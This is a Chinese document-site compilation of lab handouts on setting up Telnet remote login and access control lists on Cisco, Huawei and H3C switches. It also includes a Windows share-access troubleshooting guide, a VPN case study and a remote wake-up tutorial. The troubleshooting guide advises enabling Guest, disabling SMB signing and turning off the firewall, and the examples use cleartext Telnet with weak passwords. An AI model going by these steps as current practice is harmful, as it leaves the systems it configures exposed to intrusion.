配置Telnet方式登录 一、组网需求 1. PC通过Telnet登录交换机并对其进行管理。 2. 分别应用本地认证和Radius+本地认证方式对用户名密码进行验证。 3. 只允许192.168.1.2/24这个IP或只允许192.168.1.0/24这个IP地址段的PC进行Telnet 登录。 二、组网图 PC机和交换机之间保证路由可达,PC机可以Ping通交换机的管理地址。 三、配置步骤 1. 登录到交换机,配置本地的用户名密码 switch>enable switch#config terminal switch(config)#username test privilege15password0 test 2. 配置Telnet用户登录时的验证方式(本地验证或 Radius+本地验证) 本地验证 switch(config)#authentication line vty login local Radius + 本地验证 switch(config)#authentication line vty login radius local 注:开启Radius + 本地验证,需要根据现场情况配置Radius-Server参数,具体配置见本手册“安全认证功能配置”部分的描述。 3. 配置允许Telnet管理交换机的地址限制(单独IP 或 IP地址段) 限制单个IP允许Telnet登录交换机 switch(config)#authentication securityip192.168.1.2 限制允许IP地址段Telnet登录交换机 switch(config)#access-list1permit192.168.1.0 0.0.0.255 switch(config)#authentication ip access-class 1 in 四、配置关键点 1. 对于三层交换机,可以有多个三层虚接口,它的管理Vlan可以是任意一个具有三层接口

交换机的Telnet远程登录设置

一、实验目标 掌握采用telnet方式配置交换机的方法 二、技术原理 ?配置交换机的管理IP地址(计算机的IP地址与交换机管理IP地址在同一网段); ?为telnet用户配置用户名和登录口令: Switch(config)#enble password xxxx //设置进入特权模式的密码; Switch(config-line)#password xxxx //可以设置通过console端口连接设备及telnet远程登录时所需要的密码。 Switch(config)#line console 0 Switch(config-line)#password xxxx //设置通过console端口连接设备的密码 Switch(config-line)#login Switch(config)#line vty 0 4 Switch(config-line)#password xxxx //设置telnet远程登录密码 Switch(config-line)#login 三、实验步骤 实验拓扑 Switch>en Switch#conf t Enter configuration commands, one per line. End with CNTL/Z. 1、配置交换机的管理IP地址 Switch(config)#interface vlan 1 //默认情况下交换机所有端口都处于vlan 1 当中 Switch(config-if)#ip address 192.168.1.1 255.255.255.0 //配置交换机管理IP地址 Switch(config-if)#no shutdown //开启Interface Vlan1 %LINK-5-CHANGED: Interface Vlan1, changed state to up Switch(config-if)# %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to up

华为S交换机配置远程登陆

华为S5700交换机配置之:远程登陆 S5700交换机是华为的一款比较新的三层交换机,性能稳定,当我们拿到交换机后,如果需要进行远程管理,就必须要进行交换机的远程管理配置,本例采用S5700-48TP-SI 型号交换机来进行示例 初始配置采用Console线连接登陆 方法/步骤 通过Console线,连接交换机,进入系统视图模式 在命令模式下: 输入:systerm-view 进入系统视图模式

设置认证模式为AAA认证模式在系统视图模式命令行下: 输入:aaa 进入AAA认证模式

添加远程登陆用户,并设置用户密码及密码加密方式 进入AAA模式命令行下: 输入:local-user test password cipher welcome 甚至新用户为:test 密码为:welcome 加密模式为:cipher 密文加密 设置允许用户登陆的服务 在AAA模式命令行下: 设置完新添加用户后,输入: local-user test service-type http ssh telnet web 设置哪些服务可以通过此test用户进行验证,本例设置http ssh telnet web服务 设置用户命令级别 在AAA模式命令行下: 设置新添加的用户在命令行可以使用的命令级别,3为最高 local-user test level 3 设置完成后: 输入:quit 退回到系统视图模式 进入远程配置视图,调用AAA认证模式为远程用户验证 从系统视图模式输入:

user-interface vty 0 4 进入远程配置视图模式 然后在远程配置视图模式下,输入: authentication-mode aaa 此配置意思为,远程连接使用AAA认证模式,远程连接时可以调用AAA模式中的用户来进行登录验证 配置完成后可以退出交换机 配置完成,登陆验证 在交换机配置好远程IP的前提下,可以通过命令: telnet xx.xx.xx.xx 来进行远程登陆验证。 注意事项 不同的交换机型号可能命令不太一致,本方法对S5700系列交换机通用 设置完远程登陆用户后,一定要在远程配置模式调用AAA进行验证 注意一定要把用户可以验证的服务添加上去,service-type 中设置

服务器远程无法访问的常见解决办法

登录失败:未授予用户在此计算机上的请求登录类型。无法访问。您可能没有权限使用网络资源。请与这台服务器的管理员联系以查明您是否有访问权限。 登录失败:未授予用户在此计算机上的请求登录类型。无法访问。您可能没有权限使用网络资源。请与这台服务器的管理员联系以查明您是否有访问权限。 如果出现“xxx计算机无法访问,您可能没有权限使用网络资源。请与这台服务器的管理员联系以查明您是否有访问权限”的报错,这可能是计算机的安全设置被改动过了,导致目标计算机无法被访问。可以采取以下步骤解决: 1. 取消简单文件共享。 打开“我的电脑”,在菜单上选择“工具”->“文件夹选项”->“查看”,清除“使用简单文件共享(推荐)”的选择。 2. 启用guest账户。 右键点击“我的电脑”,选择“管理”,选择“本地用户和组”->“用户”,右键点击Guest用户,选“属性”,清除“帐户已停用”的选择。 3. 在组策略中设置,安全策略。 开始--运行--gpedit.msc--计算机配置--windows设置--安全设置--本地策略--“用户权力指派”,双击右边的“从网络访问此计算机”,保证其中有Everyone,双击左边的“拒绝从网络访问此计算机”,保证其是空的。 4. 选择左边的“本地策略”->“安全选项”, a.确认右边的“网络访问:本地帐户的共享与安全模式”为“经典”; b.确认右边的“Microsoft网络客户:为通讯启用数字签名(总是)”为“已停用”; c.确认右边的“Microsoft网络客户:为通讯启用数字签名(如果服务器允许)”为“已启用”; d.确认右边的“Microsoft网络服务器:为通讯启用数字签名(总是)”为“已停用”; e.确认右边的“Microsoft网络服务器:为通讯启用数字签名(如果服务器允许)”为“已启用”。 5.正确配置网络防火墙 1>很多机器安装了网络防火墙,它的设置不当,同样导致用户无法访问本机的共享资源,这时就要开放本机共享资源所需的NetBIOS端口。笔者以天网防火墙为例,在“自定义IP规则”窗口中选中“允许局域网的机器使用我的共享资源”规则,最后点击“保存”按钮,这样就开放了NetBIOS端口。 2>关闭windows自带防火墙。 6.合理设置用户访问权限 网络中很多机器使用NTFS文件系统,它的ACL功能(访问控制列表)可以对用户的访问权限进行控制,用户要访问这些机器的共享资源,必须赋予相应的权限才行。如使用Guest账号访问该机器的CPCW共享文件夹,右键点击该共享目录,选择“属性”,切换到“安全”标签页,然后将Guest账号添加到用户列表中,接着指定Guest的访问权限,至少要赋予“读取”和“列出文件夹目录”权限。如果想让多个用户账号能访问该共享目录,只需要添加Eeryone账号,然后赋予“读取”和“列出文件夹?.. 7、网络协议配置问题, A、网络协议的安装和设置 1.在WinXP中安装NetBEUI协议 对的,你没有看错,就是要在WinXP中安装NetBEUI协议。微软在WinXP中只支持TCP/IP协议和NWLink IPX/SPX/NetBIOS兼容协议,正式宣布不再支持NetBEUI协议。但是在建立小型局域网的实际使用中,使用微软支持的两种协议并不尽如人意。比如,在解决网上邻居慢问题的过程中,笔者采用了诸多方法后网上邻居的速度虽然好一点,但还是慢如蜗牛;另外,在设置多块网卡的协议、客户和服务绑定时,这两种协议还存在BUG,多块网卡必须同时绑定所有的协议(除NWLink NetBIOS)、客户和服务,即使你取消某些绑定重启后系统又会自动加上,这显然不能很好地满足网络建设中的实际需要。而当笔者在WinXP中安装好NetBEUI协议后,以上两个问题都得到圆满的解决。

第三章 交换机的Telnet远程登陆配置

第三章交换机的Telnet远程登陆配置 实验目标 ●掌握采用Telnet方式配置交换机的方法。 实验背景 ●第一次在设备机房对交换机进行了初次配置后,你希望以后在办公室或出差时也可 以对设备进行远程管理。现要在交换机上做适当配置。 技术原理 ●配置交换机的管理IP地址(计算机的IP地址与交换机管理IP地址在同一个网段): ●为telnet用户配置用户名和登录口令: ●交换机、路由器中有很多密码,设置对这些密码可以有效的提高设备的安全性。 ●switch(config)# enable password ****** 设置进入特权模式的密码 ●switch(config-line)可以设置通过console端口连接设备及Telnet远程登录时所 需的密码; ●switch(config)# line console 0(进入Console口配置模式) ●switch(config-line)# password jsj(设置Console口密码为abc) ●switch(config-line)# login (使console口配置生效) ●Switch(config)# line vty 0 4(设置telnet远程登录连接虚拟端口数为5个) ●Switch(config-line)# password abc(设置telnet远程登录密码为abc) ●Switch(config-line)# login(配置生效) 实验设备 Switch_2960 1台;PC 1台;直连线;配置线 PC终端 IP: 192.168.1.2 Submark: 255.255.255.0 Gateway: 192.168.1.1 实验步骤 新建Packet Tracer拓扑图 配置交换机管理IP地址 ●Switch> enable (进入特权模式) ●Switch# config (进入全局模式) ●Switch(config)# intface vlan 1 (进入交换机VLAN1端口) ●Switch(config-if)# ip address 192.168.1.1 255.255.255.0(配置交换机IP地址)

管理交换机的访问方式

管理交换机的访问方式 【实验名称】 配置交换机的访问方式。 【实验目的】 掌握交换机的管理特性,学会配置交换机支持Telnet操作的相关语句。【背景描述】 假设某学校的网络管理员第一次在设备机房对交换机进行了初次配置后,他希望以后在办公室或出差时也可以对设备进行远程管理,现要在交换机上做适当配置,使他可以实现这一愿望。 本实验以S2126G交换机为例,交换机命名为SwitchA。1台PC机通过串口(COM)连接到交换机的控制(Console)端口,通过网卡(NIC)连接到交换机的F0/1端口。 假设PC机的IP地址和网络掩码分别为192.168.0.137,255.255.255.0,配置交换机的管理IP地址为192.168.0.138,子网掩码为255.255.255.0。【技术原理】 交换机的管理方式基本分为两种:带内管理和带外管理。 通过交换机的Console口管理交换机属于带外管理,不占用交换机的网络接口,但特点是线缆特殊,需要近距离配置。 第一次配置交换机时必须利用Console进行配置,可以配置交换机支持带内管理。 带内管理方式主要有:telnet、Web、SNMP。 telnet远程管理是指交换机的网络接口,连接到网络中的某台主机。 利用这台主机进行远程的管理和配置,特点是网管人员可以进行远程的控制。

交换机在出厂情况下是没有配置支持远程登录的。 Web方式是指通过网页的形式对交换机进行配置管理。 SNMP是指利用网管软件基于SNMP协议统一对网络中的设备进行管理和配置。【实现功能】 使网络管理员可以通过Telnet、Web方式对交换机进行远程管理。 【实验设备】 S2126G(1台)、直连线(1条) 【实验拓扑】 【实验步骤】 步骤一 在交换机上配置管理IP地址。 switch>enable //进入特权模式 switch # configure terminal //进入全局配置模式 switch (config)# hostname SwitchA //修改交换机名为SwitchA SwitchA(config)# interface vlan 1 //进入vlan 1 SwitchA(config-if)# ip address 192.168.0.138 255.255.255.0

远程登录访问限制

远程登录访问限制 路由器备份与恢复 网络拓扑图 注:X为自己学号后两位。 任务要求: 1、IP编址 子网分配如图所示,子网内部IP地址分配必须满足以下要求: (1)R1的S0/0/0端口分配子网中最小主机地址; (2)以太网中,路由器端口分配子网中最大主机地址,主机或服务器从子网中最小主机地址开始依序分配。 (3)交换机管理VLAN是VLAN1,S1与S2的VLAN1的IP地址分别是各自子网内第4个主机地址。 完成IP地址分配之后,请填充下面的表格: 2、远程访问

(1)开启远程访问功能 在R1上创建用户名(姓名全拼首字母)和密码(学号后两位),并开启虚拟终端远程访问功能,本地验证。设置特权密码为自己学号后两位。 确保A、B、C、D、E、F这6台主机都可以远程访问路由器R1。

(2)远程访问限制 在R1上创建标准访问控制列表,实现以下访问限制:1)子网192.X.1.0/27中,只允许主机A远程访问路由器R1;2)子网192.X.1.64/26中,除了主机D,允许其他所有主机访问路由器R1。 3、路由器备份与恢复 (1)配置文件备份与恢复 将R1、R2、S1、S2四台网络设备上的运行配置文件保存NVRAM中,进而保存到TFTP 服务器上(文件名分别为R1-config,R2-config, S1-config, S2-config)。 删除R1、R2、S1、S2四台网络设备的NVRAM中的startup-config启动配置文件,并从TFTP服务器上恢复。

(2)IOS备份与恢复 将路由器R1 FLASH中的IOS文件备份到TFTP服务器中; 删除R1 FLASH中的IOS文件; 重启路由器; 从TFTP服务器上把IOS文件恢复到R1路由器的FLASH存储器中。

交换机的Telnet远程登陆及端口聚合配置

交换机的Telnet远程登陆配置 目标 ●掌握采用Telnet方式配置交换机的方法。 背景 ●在设备机房对交换机进行了初次配置后,希望以后可以对设备进行远程管理。现要 在交换机上做适当配置。 技术原理 ●配置交换机的管理IP地址(计算机的IP地址与交换机管理IP地址在同一个网段): ●在2层交换机中,IP地址仅用于远程登录管理交换机,对于交换机的运行不是必 需,但是若没有配置管理IP地址,则交换机只能采用控制端口console进行本地配 置和管理。 ●默认情况下,交换机的所有端口均属于VLAN1,VLAN1是交换机自动创建和管 理的。每个VLAN只有一个活动的管理地址,因此对2层交换机设置管理地址之 前,首先应选择VLAN1接口,然后再利用IP address配置命令设置管理IP地址。 ●为telnet用户配置用户名和登录口令: ●交换机、路由器中有很多密码,设置对这些密码可以有效的提高设备的安全性。 ●switch(config)# line vty 0 4表示配置远程登录线路,0~4是远程登录的线 路编号。 ●switch(config-line)# login 用于打开登录认证功能。 ●switch(config-line)# password 5ijsj //设置远程登录进入访问的密码 步骤 ●新建Packet Tracer拓扑图 ●配置交换机管理ip地址 ●Switch(config)# int vlan 1 ●Switch(config-if)# ip address **IP** **submask*** ●配置用户登录密码 ●Switch(config)# enable password ******* 设置进入特权模式的密码 ●Switch(config)# line vty 0 4

交换机的telnet远程登录配置

实训项目六交换机的telnet远程登录配置 一、实训目的 1) 掌握交换机命令行各种操作模式的区别,以及模式之间的切换 2) 掌握交换机的全局基本配置 3) 掌握交换机端口的常用基本配置参数 4) 查看交换机系统和配置信息和当前交换机的工作状态 二、实训环境 拓扑图 三、实训内容 熟悉交换机配置命令的使用 四、实训步骤 1. 交换机命令行操作模式的进入 (1)通过计算机的终端设备对交换机进行配置: Switch>enable 进入特权模式 Switch#configure terminal 进入全局配置模式

Switch(config)# Switch(config)# interface vlan 1 默认情况下,交换机的所有端口都处于vlan 1中 Switch(config-if)#ip address 192.168.1.1 255.255.255.0 Switch(config-if)#no shutdown 开启vlan 1的状态 Switch(config-if)#exit 返回上一级模式 (2)配置进入特权模式的登录密码 Switch(config)# enable password 123456 (3)配置telnet远程登录密码 Switch(config)#line vty 0 4 进入线程配置模式 Switch(config-line)#password jsj 配置Telnet的密码 Switch(config-line)#login 启用Telnet的用户名密码验证Switch(config-line)#end (4)查看交换机的配置信息 Switch#show running-config hostname Switch! enable password 123456 interface FastEthernet0/1 interface FastEthernet0/2……………… interface Vlan1 ip address 192.168.1.1 255.255.255.0 line vty 0 4 password jsj login (5)设置PC1的IP地址

交换机的Telnet远程登陆配置

2.3 交换机的Telnet远程登录配置 预备知识: 使用Console口配置交换机虽然不占用网络带宽,但由于要使用专用配置线缆,而配置线缆较短,一般1.5到3米,所以对于要配置分散在不同楼、不同楼层或不在同一区域的交换机时变得麻烦,工作效率也不高,这种方式适用于首次对交换机配置。而带内管理只需要配置好交换机后,在任何一台能连接到设备的终端计算机上即可对网络上的任何交换机进行配置管理,对于管理大中型网络,这种管理方式能大大提高工作效率。 使用Telnet远程登录对交换机进行配置就是最常用的带内管理方式的一种,这种管理方式首先需要通过Console口连接到交换机,配置交换机的远程管理地址,然后进入vty线路配置模式配置远程登录密码并开启远程登录功能。由于是远程登录管理交换机,所以出于安全考虑,交换机必须要配置特权用户密码才能进行远程登录。配置好交换机后可使用网络中的任何一台与设备连通的计算机里的telnet程序连接到交换机进行管理。 一、实训目的 1、了解TELNET远程登录的作用 2、掌握TELNET远程登录的配置命令 二、应用环境 某校园网上的交换机分布在各栋楼的不同楼层里,由于经常需要进行网络配置,使用CONSOLE口对交换机进行配置需要到该交换机前进行配置,一次小的配置改动就要到多栋楼的不同楼层进行配置,降低了管理效率。交换机的TELNET远程登录允许管理员从网络上的任意终端登录并进行管理,登录时只需要输入登录用户名和密码就可以像使用console 口一样管理交换机,从而提高管理效率。 三、实训要求 1.设备要求: 1)两台2950-24交换机和一台PC机。 2)一条交叉双绞线、一条直通双绞线、一条配置线。 2.实训拓扑图 3.配置要求:

最全的交换机远程登录配置实例

1.关于连接端口问题 使用telnet登录时,用于连接交换机的端口应属于vlan1(默认vlan),其他vlan,则无法登录。 2.关于用户权限、口令设置及修改问题 默认情况下,从vty用户界面登录后可以访问的命令级别为0级。这里的命令级别是指登录到交换机后,对交换机操作的命令级别,而与telnet登录权限无关。但在telnet状态下,只有属于管理级(3级)的用户,才可以进入用户系统视图进行操作。因此,如果要想用telnet 登录对交换机进行配置,首先需要先用console登录,对交换机进行telnet登录用户名、口令、命令权限配置。 例1:用console口进行TELNET密码、命令级别设置 [H3C] user-interface vty 0 4 //进入vty用户视图 [H3C-ui-vty0-4] authentication-mode password //在vty用户视图设置[H3C-ui-vty0-4] set authentication password simple 123456 //设置明文密码 [H3C -ui-vty0-4]user privilege level 3 //设置命令级别 例2:用console口进行TELNET用户名、密码、命令级别设置 [H3C]user-interface vty 0 4 //进入vty用户视图 [H3C -ui-vty0-4]authentication-mode scheme //进行用户名称+口令方式进行配置[H3C]local-user test // 设置本地用户名为test [H3C -user-test]service-type telnet level 3 //设置test用户命令级别为3 [H3C -user-test]password simple 123456 //设置test用户密码为123456 例3:TELNET登录后对用户test修改口令 [H3C]local-usertest //进入test用户视图 [H3C -user-test]service-type telnet level 3 //如果少此步,则不能进行口令修改[H3C -user-test]password simple test999 //修改test用户密码为test999

Telnet访问控制典型配置举例

1 简介 本文介绍使用访问控制列表和IP Source Guard功能控制远程Telnet无线控制器的典型配置案例。 2 配置前提 本文档不严格与具体软、硬件版本对应,如果使用过程中与产品实际情况有差异,请参考相关产品手册,或以设备实际情况为准。 本文档中的配置均是在实验室环境下进行的配置和验证,如果您已经对设备进行了配置,为了保证配置效果,请确认现有配置和以下举例中的配置不冲突。 本文档假设您已了解Telnet、ACL和IP Source Guard特性。 3 配置举例 3.1 组网需求 如图1所示,两台主机到AC路由可达。通过在AC上配置ACL功能以实现:仅允许Host A通过Telnet登录AC,不允许Host B通过Telnet登录AC。 图1 基于AC的Telnet访问控制组网图 3.2 配置思路 ? ???????????? 为了实现仅允许Host A可以通过Telnet方式登录AC,需要通过ACL 来匹配Host A的IP地址,并在AC的VTY用户线视图下使用该ACL对Telnet 客户端进行限制。 ? ???????????? 为了防止其它主机使用Host A的IP地址Telnet登录AC,需要在Switch 上配置全局静态绑定表项,将Host A的IP地址和MAC地址进行绑定。3.3 配置步骤 3.3.1 AC的配置 (1)配置ACL

# 创建一个编号为2000的基本ACL,并进入其视图。 system-view [AC] acl number 2000 # 创建规则仅允许来自100.1.1.2/16主机的报文通过。 [AC-acl-basic-2000] rule 0 permit source 100.1.1.2 0 [AC-acl-basic-2000] quit (2)将ACL应用到VTY用户界面 # 进入VTY 0~4用户界面视图。 [AC] user-interface vty 0 4 [AC-ui-vty0-4] acl 2000 inbound [AC-ui-vty0-4] quit # 启动Telnet服务。 [AC] telnet server enable 3.3.2 Switch的配置 # 配置全局IPv4静态绑定表项,绑定IP地址100.1.1.2和MAC地址0001-0203-0405。 [Switch] ip source binding ip-address 100.1.1.2 mac-address 0001-0203-0405 3.4 验证配置 # 使用display ip source binding命令显示IPv4绑定表项信息。 [Switch] display ip source binding Total entries found: 1 MAC Address IP Address VLAN Interface Type 0001-0203-0405 100.1.1.2 N/A N/A Static # Host A通过Telnet远程登录到AC,在AC的视图下观察到访问成功。 #Nov 20 11:15:17:407 2013 AC SHELL/4/LOGIN: Trap 1.3.6.1.4.1.25506. 2.2.1.1. 3.0.1: login from VTY %Nov 20 11:15:17:428 2013 AC SHELL/5/SHELL_LOGIN: VTY logged in from 100.1.1.2. # Host B通过Telnet远程登录AC,在Telnet远程登录视图下,观察到Host B登录AC失败。 # 使用display acl命令显示全部ACL的配置和运行情况。 display acl 2000 Basic ACL 2000, named -none-, 1 rule, ACL's step is 5 rule 0 permit source 100.1.1.2 0 # 使用display users all命令显示当前正在使用的用户界面的相关信息。 display users all The user application information of all user interfaces: Idx UI Delay Type Userlevel + 0 CON 0 00:00:00 3 7 AUX 0 + 8 VTY 0 00:00:05 TEL 3 9 VTY 1 10 VTY 2

远程接入中的安全访问控制

远程接入中的安全访问控制 远程接入中的安全访问控制 摘要:以实际项目应用为例,利用VPN、防火墙、策略交换机等几种典型设备,对解决企业的远程办公接入问题进行深入探究。关键词:远程接入;VPN技术;网络安全 大型企业通常会有若干分驻全国各地的分支机构和为数不少的出差人员,为了解决这些员工的远程办公问题,使他们能够及时了解企业运转情况和参与生产、经营、管理工作的流程运转,远程接入成为一个现实的需求。VPN技术、防火墙的安全过滤技术、三层交换机的路由和控制技术共同实现了远程用户对企业不同应用域的安全访问控制。通过VPN接入,企业可以保证出差在外的员工访问公司里的信息,此外,通过笔记本电脑和一张基于VPN的CDMA1X卡,员工可以真正实现随时随地访问企业局域网的愿望。1远程访问的主要技术手段某大型供电企业网络远程访问系统的拓扑图,主要由VPN客户端软件、VPN客户端E-Key、VPN网关、密钥管理中心、防火墙和策略路由交换机组成。该系统满足了企业员工通过多种网络环境,利用互联网通道访问企业内部网络资源的需求。通过身份认证系统确保了远程网络用户的真实性;通过对网络传递数据的加密确保了网络传输数据的机密性、真实性和完整性;通过对用户的分级管理和访问管理域的划分设定了不同类别的认证用户对OA办公区域、输变电生产管理区域、配网生产管理区域和市场营销管理区域等不同应用区域的访问权限,有效降低了企业信息资源的潜在风险。

2企业选择IPSec技术的主要原因企业选择IPSec技术的主要原因有以下几个方面:(1)经济。不用承担昂贵的固定线路的租费。DDN、帧中继和SDH的异地收费随着通信距离的增加而递增,分支越远,租费越高,而基于Internet则只承担本地的接入费用。(2)灵活。连接Internet的方式可以是10Mb/s、100Mb/s端口,也可以是2Mb/s 或更低速的端口,还可以是便宜的DSL连接,甚至可以是拨号连接。(3)广泛。IPSecVPN的核心设备扩展性好,一个端口可以同时连接多个分支,包括分支部门和移动办公的用户。(4)多业务。远程的IP话音业务和视频也可传送到远端分支和移动用户,连同数据业务一起,为现代化办公提供便利条件,节省大量长途话费。(5)安全。IPSecVPN的显著特点是其安全性,这是它保证内部数据安全的根本。在VPN交换机上,通过支持所有领先的通道协议、数据加密、过滤/防火墙以及通过Radius、LDAP 和SecurID实现授权等多种方式保证安全。同时,VPN设备提供内置防火墙功能,可以在VPN通道之外,从公网到私网接口传输流量。3系统的实现该大型企业采用北电的PP8606路由交换机,以提供不同应用安全域的网段划分和策略控制。同时,部署带VPN功能的NetEye防火墙,它集VPN网关、密钥管理中心和防火墙于一体,提供密钥的生成、管理与分发,完成认证区域的划分、用户的接入和认证、用户IP地址的分配与访问控制功能。3.1通信密钥的生成与管理VPN网络安全的关键是保证整个系统的密钥管理安全。NetEyeVPN采用基于PKI的密钥管理框架,实现安全可靠的密钥分发与管理。密钥管理中心设立在网络中心。登录密钥管

华为交换机配置Telnet远程登录设备

system-view //进入系统试图 telnet server enable //打开Telnet服务 //以下为配置VTY界面 user-interface maximum-vty 8 //配置VTY用户界面 user-interface vty 0 7 //进入VTY用户界面 protocol inbound telnet authentication-mode aaa //配置用户为AAA认证模式 quit //退出系统试图 //以下为配置AAA认证属性 aaa //进入AAA视图模式 local-user admin password irreversible-cipher hauwei@nei //设置admin用户密码为huawei@hauwei local-user admin service-type telnet //设置用户admin服务方式为Telnet local-user admin privilege level 3 //设置用户admin权限级别为3 quit //退出AAA试图模式 命令详解: Quidway]user-interface vty 0 4 ;进入虚拟终端 [S3026-ui-vty0-4]authentication-mode password ;设置口令模式 [S3026-ui-vty0-4]set authentication-mode password simple 222 ;设置口令 [S3026-ui-vty0-4]user privilege level 3 一、第一句的意思是:进入到vty 终端,在华为的交换机里,vty就是人家用telnet远程进入到你交换机的界面,最多有五个,所以说你可以vty 0 vty 1 vty... vty 4交换机最多可以允许五个人同时在线进到交换机里去配置命令的。vty0 4 就是说把这五个界面一起配置了,这五个界面进去的话,都是使用以下的配置。 二、用的认证模式是密码认证,可以使用scheme模式来,也可以用password来,用password 的话,是要密码的,就是说你telnet的话,要输入密码才能登陆到包交换机里去的。 二、设置密码为明文密码,密码是123 ,如果是密文的话,就是cipher 四、用户等级为3,也就是最高的,华为的命令级别很多,分为四级,0 1 2 3 ,0是参观级,

如何远程唤醒并控制家中关机的电脑

如何远程唤醒并控制家中关机的电脑 有时我们可能会碰到这样的情况:在公司临时需要家里电脑中的资料,但又不可能马上跑回家打开电脑拷贝吧。此时如果能在公司就能远程打开家中的电脑,并能进行远程访问控制,不就一切迎刃而解了吗!那么,又该如何实现这种远程控制呢? 要实现这种远程控制,肯定需要软件帮忙,在这方面使用最普遍的莫过于PcAnywhere。不过大家也必须清楚,想通过PcAnyWhere控制远程计算机,必须知道被控端计算机IP地址,而一般家庭ADSL用户一般都没有固定IP地址,每次上网的IP地址都是由ISP态分配的。由于断电或路由器重启等原因,IP 地址就会发生变化;PcAnyWhere也就失去了用武之地,因此获取被控制端的IP地址是实现这种远程控制的前提。下面开始具体实战。 这里暂且将公司电脑称为主控端,家中电脑称为被控端。整个实现流程分为两大部分: 1、被控端准备。配置远程唤醒、获取网卡MAC地址、配置IP地址解析、安装远程控制软件。 2、主控制设置。安装远程开机软件、安装远程控制软件。 另外选用的是PcAnywhere 10.51简体中文正式版,下载地址: https://www.wendangku.net/doc/6510946373.html,/2004/817.html 一、被控端准备篇。 当然,这里的被控端准备是指事先的准备,这一部分是关系到远程控制能否顺利实现的前提。 1、配置远程唤醒。 由于是要调用家里计算机中的资料,因此家里计算机肯定要处于开机状态;假设家里没人无法开启,那么就得想办法远程让这台计算机自动开机,这就需要被控计算机具备远程唤醒功能(WOL)。 首先是网卡必须支持WOL;其次还要查看主板是否支持Wake-Up On Internal Modem(WOM)或者Wake-up On LAN(WOL),如果支持就说明主板支持远程开机。除此以外,计算机还必须安装有符合ATX 2.03标准的ATX电源。以上条件缺一不可,如果你的被控端不支持这些功能,那你还是趁早打消这个“远程”念头。 接下来进入CMOS设置,选择划红线处电源管理一项(不同的BIOS版本可能位置不一样),敲回车键进入,如图1。 在接着出现的设置界面中,将红色方框内的两个选项“resume by Ring/LAN(有些版本是Wake Up On LAN/Ring)”和“Wake Up on PCI PME#”都设置为“enabled”,意为启用这两项功能,如图2所示,这样就启用了该计算机的远程唤醒功能。有些网卡需要通过跳线才能将“Wake-on-LAN”功能设置为“Enable”。 提示:如果主板不支持PCI 2.2标准,还需要将WOL电缆的两端分别插入网卡和主板的3芯插座中,将网卡与计算机主板连接起来。

相关文档
相关文档 最新文档